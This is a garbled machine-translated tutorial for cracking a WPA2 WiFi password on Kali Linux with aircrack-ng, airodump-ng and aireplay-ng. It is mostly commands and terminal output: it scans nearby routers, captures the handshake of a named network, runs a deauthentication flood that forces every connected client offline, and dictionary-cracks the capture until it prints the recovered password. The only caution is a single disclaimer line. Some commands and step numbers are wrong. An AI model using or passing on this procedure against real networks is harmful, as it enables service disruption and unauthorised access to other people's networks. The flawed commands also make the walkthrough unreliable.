Wireless routing attack and WiFi password cracking practice [penetration technology]

One 、 Preparation stage

• Attack host ：kali Linux
• Attack tools ：aircrack-ng、airodump-ng、airmon-ng、aireplay-ng
• One network card
  

My network card is called ：wlan0

[email protected]:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Two 、 Attack phase

1. Stop the network administrator

To prevent interference , We need to shut down the network administrator

Stop the network administrator

sudo service network-manager stop

Kill process

sudo airmon-ng check kill

2. Turn on the network card monitoring mode

After the monitor is turned on , You can listen to nearby routing devices through the network card .

grammar ：sudo airmon-ng start adapter name

example :

sudo airmon-ng start wlan0mon

The following forms indicate successful opening ！

[email protected]:~# sudo airmon-ng start wlan0mon


PHY     Interface       Driver          Chipset

phy0    wlan0mon        rt2800usb       Ralink Technology, Corp. RT2870/RT3070

                (mac80211 monitor mode already enabled for [phy0]wlan0mon on [phy0]wlan0mon)

After opening successfully, you can find that the network card name is from ：wlan0 Turned into wlan0mon

[email protected]:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off

3. Capture packets

Capturing packets means , Scan the nearby router through the network card , As for the distance of scanning , Determined by the quality of your network card , The routing information can be obtained by scanning MAC Address （BSSID ）、 channel （CH） value 、 WiFi Name 、 Encryption methods and so on .

grammar ： airodump-ng adapter name

example :

sudo airodump-ng wlan0mon

When you see the route to attack WiFi name （ Drone aircraft ） when , Press CTRL+C stop it , As shown in the figure below ：（ What I want to attack is ：WiFi be known as CMCC-QingFeng The router ）

[email protected]:~# airodump-ng wlan0mon

 CH 13 ][ Elapsed: 26 mins ][ 2020-08-15 23:57                                                                                            
                                                                                                                                          
 BSSID              PWR  Beacons    #Data, #/s CH MB ENC CIPHER AUTH ESSID 
                                                                                                                                          
 80:54:6A:6C:BA:C0  -50      407     4907   40   1  130   WPA2 CCMP   PSK  CMCC-QingFeng                                                  
                                                                                                                                          
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                        
                                                                                                                                          
 (not associated)   22:C9:4E:48:C1:16  -78    0 - 1      0       12                                                                        80:54:6A:6C:BA:C0  38:37:8B:07:71:69  -18    0e- 6      0      534                                                                       
 80:54:6A:6C:BA:C0  7C:B3:7B:95:BA:50  -62    0e- 0e     8     2476                                                                       
 80:54:6A:6C:BA:C0  F4:70:AB:95:A1:14  -78    0e- 1      0     1375                                                                       
 80:54:6A:6C:BA:C0  70:C9:4E:48:C1:16  -76    0e- 1    396     2485         CMCC-QingFeng                                                 
Quitting...                                                       

4. Get packets

Get packets （ Handshake bag ） The main function of is to prepare for the following cracking .

grammar ：

sudo airodump-ng -c -w  --bssid   adapter name 

Parameter description ：

• -c： Channel value
• -w： The saved path of the obtained packet
• –bssid：MAC Address

example :

 sudo airodump-ng -c 1 -w /root/admin --bssid  80:54:6A:6C:BA:C0   wlan0mon

5. Inject packets （DeAuth Flood attack ）

Send continuously to the routing device De authentication packet , During this process, all connected devices will be forced offline . If it can be cracked , Then the handshake packet will be displayed in the upper right corner of the terminal in step 4 , The file will be saved in the location you specify . Some encryption methods are not easy to crack , Influenced by many factors , such as Dictionary strength , host , In short, a strong dictionary is essential .

grammar ：

sudo aireplay-ng -0  n	-a	 adapter name 

Parameter description ：

• -0： Indicates the de authentication packet
• n： Indicates the number of attacks （ The number of packets sent to the router ）
• -a： Of the corresponding router BSSID value
• adapter name ： The name of your network card , It can be done by sudo iwconfig see

example :

Step 4 do not close the terminal , Create a new terminal and enter the following code , You can attack the router , When you connect to this router, you can find that you can't connect at all , If you have previously connected to this router , After executing the following command, you can find that the client is forced offline , The length of time depends on the number of attacks , In the following example, my number of attacks is 5 Time .

sudo aireplay-ng -0  5  -a   80:54:6A:6C:BA:C0  wlan0mon

[email protected]:~# sudo aireplay-ng -0 5 -a 80:54:6A:6C:BA:C0 wlan0mon
00:34:39  Waiting for beacon frame (BSSID: 80:54:6A:6C:BA:C0) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
00:34:39  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
00:34:40  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
00:34:40  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]

notes ： When you execute the above command , All connected clients will be forced offline , Bear in mind ！ Bear in mind ！ Bear in mind , Don't use this to do something illegal .

5.WiFi Password cracking

This step is to crack the password , As for whether it can be cracked, it depends on your Dictionary strength and The host is not awesome 了 , And there must be Patience, etc 了 , ha-ha ！

grammar ：aircrack-ng -w Dictionary path has.cap route

example :

aircrack-ng -w /root/admin/directory/dic1  /root/admin/-01.cap

[email protected]:~/admin# aircrack-ng -w /root/admin/directory/dic1 /root/admin/-01.cap
Reading packets, please wait...
Opening /root/admin/-01.cap
Read 165406 packets.

   # BSSID ESSID Encryption

   1  80:54:6A:6C:BA:C0  CMCC-QingFeng             WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening /root/admin/-01.cap
Read 165406 packets.

1 potential targets


                               Aircrack-ng 1.6 

      [00:00:00] 1/1 keys tested (13.07 k/s) 

      Time left: --

                           KEY FOUND! [ guu3nif2 ]


      Master Key     : A7 21 22 70 BA 88 13 33 CE DB 99 89 A3 02 B4 0E 
                       3E 70 BB FF D3 39 DA B0 70 B4 61 08 38 BF 9D 19 

      Transient Key  : DC 87 B9 63 C4 D8 47 AE 0F 69 3E A3 E9 73 20 6E 
                       DC B3 B7 6E DD 68 AB 4A 2F 0B 94 A3 6A 9A 53 2C 
                       FA 30 6C 2B C8 8A 1C A8 73 2F 1B DB F8 A9 3D 56 
                       9B 91 3B 23 3D 70 AA 89 B3 02 96 27 D6 86 A4 5F 

      EAPOL HMAC     : 05 48 48 0A CB 6D 82 89 26 93 8B C2 3F 31 0C 86